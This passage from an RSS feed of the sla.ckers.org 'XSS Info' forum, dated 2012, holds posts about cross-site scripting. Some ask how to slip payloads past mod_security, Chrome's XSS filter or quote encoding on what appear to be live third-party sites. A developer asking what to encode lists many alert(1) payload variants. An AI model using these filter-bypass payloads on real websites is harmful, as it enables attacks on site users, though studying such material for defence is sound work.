            <description><![CDATA[The site I found an XSS on appears to be using mod_security. Anything with &quot;&lt;script&quot; or &quot;&lt; script&quot; in the URL returns a 403 page. Googling around shows that there are numerous possible workarounds to the filter; however, I'm not sure how I can combine it with bypassing Chrome's filter.<br />
<br />
&lt;svg&gt;&lt;script&gt;//&amp;#x0A;alert(1)&lt;/script&gt; works with Chrome (due to a current bug in Chrome's XSS filter), but not mod_security, due to mod_security not allowing &lt;script<br />
<br />
&lt;img src=&quot;x:blah&quot; onerror=&quot;alert(1)&quot;&gt; seems to bypass mod_security, but Chrome strips onerror and all other on attributes.<br />
<br />
Both these filters are definitely vulnerable, but I don't know how to make something that'll bypass both.<br />
<br />
I control the attribute of an &lt;a onclick=&quot;&quot;&gt;, and there's no escaping or filtering done by the web app itself. So &quot;&gt; does break me out. I only control that one variable though.<br />
<br />
Any ideas?<br />
<br />
Thanks.]]></description>
            <dc:creator>serpentine85</dc:creator>
            <category>XSS Info</category>
            <pubDate>Thu, 05 Apr 2012 17:19:30 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,45384,45384#msg-45384</guid>
            <title>Can anyone tell me something about &lt;![CDATA[]]&gt;]]&gt; XSS ? (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?2,45384,45384#msg-45384</link>
            <description><![CDATA[Hi,<br />
<br />
Can anyone tell me something about &lt;![CDATA[]]&gt;]]&gt; XSS vulnerability?<br />
<br />
please have a look at the following link.<br />
<br />
https://www.owasp.org/index.php/Testing_for_XML_Injection_(OWASP-DV-008)<br />
<br />
It tells something about CDATA section delimiters: &lt;![CDATA[ / ]]&gt;<br />
<br />
Can anyone elaborate that, with examples?<br />
<br />
Also is it associated with .xhtml pages? Is it required to handle CDATA &quot;]]&gt;&quot; character for XSS in .html application?<br />
<br />
Regards,<br />
Dinesh]]></description>
            <dc:creator>neuf.martial</dc:creator>
            <category>XSS Info</category>
            <pubDate>Mon, 02 Apr 2012 08:10:09 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,45368,45368#msg-45368</guid>
            <title>Are the following characters XSS vulnerable? (3 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?2,45368,45368#msg-45368</link>
            <description><![CDATA[Hi,<br />
   We are trying to implement security in our application, wherein we need to encode and decode the user inputs.<br />
<br />
So can anybody please provide me a list of all the characters that are disallowed or dangerous, that I need to encode?<br />
<br />
For eg. for &quot;&lt;&quot; character we use &amp;lt;, for &quot;&gt;&quot; character we use &amp;gt;<br />
<br />
so can anybody please tell me if the following mentioned characters are XSS vulnerable, and if yes, then how to encode them?<br />
<br />
1) ! - exclamation mark - characters for additional command execution<br />
<br />
2) - hyphen - can be used in database queries, and the creation of negative numbers.<br />
<br />
3) /\ = The forward-slash and back-slash are often used for faking paths and queries<br />
<br />
4) { } [ ] = Curly brackets and square brackets are often used as script, program or regex expressions.<br />
<br />
5) *(asterisk) = Often used in database queries for “all”.<br />
<br />
eg. &lt;script&gt;x=&quot;&quot;*alert(1)*&quot;&quot;;y=42;&lt;/script&gt; <br />
<br />
6) `(Grave accent) = If you need to use both double and single quotes you can use a grave accent(`) to encapsulate the JavaScript string - this is also useful because lots of cross site scripting filters don't know about grave accents.<br />
<br />
&lt;IMG SRC=`javascript:alert(&quot;Hello, 'XSS'&quot;)`&gt;<br />
<br />
7) / (division or forward slash) - <br />
<br />
&lt;script&gt;x=&quot;&quot;/alert(1)/&quot;&quot;;y=42;&lt;/script&gt;<br />
<br />
8) Bitwise “xor” operator: (^)<br />
<br />
<br />
&lt;script&gt;x=&quot;&quot;^alert(1)^&quot;&quot;;y=42;&lt;/script&gt;<br />
<br />
<br />
9) Bitwise Left Shift (&lt;&lt;)<br />
<br />
&lt;script&gt;x=&quot;&quot;&lt;&lt;alert(1)&lt;&lt;&quot;&quot;;y=42;&lt;/script&gt; <br />
<br />
<br />
<br />
10) Bitwise Right Shift (&gt;&gt;)<br />
<br />
&lt;script&gt;x=&quot;&quot;&gt;&gt;alert(1)&gt;&gt;&quot;&quot;;y=42;&lt;/script&gt; <br />
<br />
<br />
<br />
11) Bitwise Right Shift With Zeros <br />
<br />
&lt;script&gt;x=&quot;&quot;&gt;&gt;&gt;alert(1)&gt;&gt;&gt;&quot;&quot;;y=42;&lt;/script&gt;<br />
<br />
<br />
<br />
12) Ternary Conditional Expression<br />
<br />
&lt;script&gt;x=&quot;&quot;?alert(1):&quot;&quot;;y=42;&lt;/script&gt;<br />
<br />
<br />
Please let me know if I need to encode these characters too. I am using Java for development.<br />
<br />
Thanks]]></description>
            <dc:creator>neuf.martial</dc:creator>
            <category>XSS Info</category>
            <pubDate>Mon, 18 Jun 2012 20:19:41 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,43662,43662#msg-43662</guid>
            <title>Found 8 Xss  on baidu.com but who cares.:P (5 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?2,43662,43662#msg-43662</link>
            <description><![CDATA[http://vaibs.comuv.com/baidu%20xss.jpg<br />
<br />
Who knows chinese or what ever can find that page.<br />
Let see]]></description>
            <dc:creator>Vaibs</dc:creator>
            <category>XSS Info</category>
            <pubDate>Tue, 25 Dec 2012 23:33:04 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,43565,43565#msg-43565</guid>
            <title>XSS double quotes filter bypass (5 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?2,43565,43565#msg-43565</link>
            <description><![CDATA[Hi guys, is there any any method which let you to bypass double quotes encoding to \&amp;quot; in order to close the value tags? I don't need the String.fromCharCode() function, and there isn't any variable which saves the searched value...<br />
The code looks like:<br />
<pre class="bbcode">&lt;input type=&quot;text&quot; name=&quot;search&quot; value=&quot;&amp;quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;&quot;&gt;</pre>
Any help please?]]></description>
            <dc:creator>Pr3nK</dc:creator>
            <category>XSS Info</category>
            <pubDate>Wed, 14 Mar 2012 04:19:11 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,43563,43563#msg-43563</guid>
            <title>IE blocks accessing document object in flash file (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?2,43563,43563#msg-43563</link>
            <description><![CDATA[In my flash application I need to get browser cookie. Internet Explorer don't allow flash to access document object. I want to know what is the problem does it relate to Internet Explorer xss filter? I have test my application with xss filter option disalbed in IE but again no result. This simple code works well in all browsers(Firefox, Chrome, Opera) but don't work in Internet Explorer, anybody know why? <br />
Thanks.<br />
<br />
don't work:<br />
ExternalInterface.call(&quot;eval&quot;,&quot;alert(document.cookie)&quot;);<br />
ExternalInterface.call(&quot;eval&quot;,&quot;alert(document.location)&quot;);<br />
<br />
but this work well:<br />
ExternalInterface.call(&quot;eval&quot;,&quot;alert(window.location)&quot;);]]></description>
            <dc:creator>behnaz</dc:creator>
            <category>XSS Info</category>
            <pubDate>Sun, 11 Mar 2012 10:15:09 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,43308,43308#msg-43308</guid>
            <title>Close but no cigar, help for the final hurdle? (2 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?2,43308,43308#msg-43308</link>
            <description><![CDATA['&quot;(){}/\&lt;&gt; - test chars<br />
<br />
Results in source:<br />
<br />
 &lt;input type=&quot;hidden&quot; name=&quot;pageURL&quot; value=  (){}/\&gt;<br />
<br />
and bit further down:<br />
<br />
&lt;input type=&quot;text&quot; name=&quot;link&quot; id=&quot;link&quot; style=&quot;width:400px&quot; value=&quot;  (){}/\&quot;/&gt; <br />
<br />
<br />
Can't think of any input type xss which doesn't use '  &quot;  ', can anyone help?<br />
<br />
Closest I have got:<br />
<br />
 &lt;input type=&quot;hidden&quot; name=&quot;pageURL&quot; value=/ AUTOFOCUS onfocus=alert(1) &gt;<br />
[but no alert]<br />
<br />
[using Firefox, but any browser would be a help]<br />
<br />
TheGreatEscape]]></description>
            <dc:creator>thegreatescape</dc:creator>
            <category>XSS Info</category>
            <pubDate>Sun, 04 Mar 2012 14:12:47 -0600</pubDate>
        </item>
    </channel>
</rss>
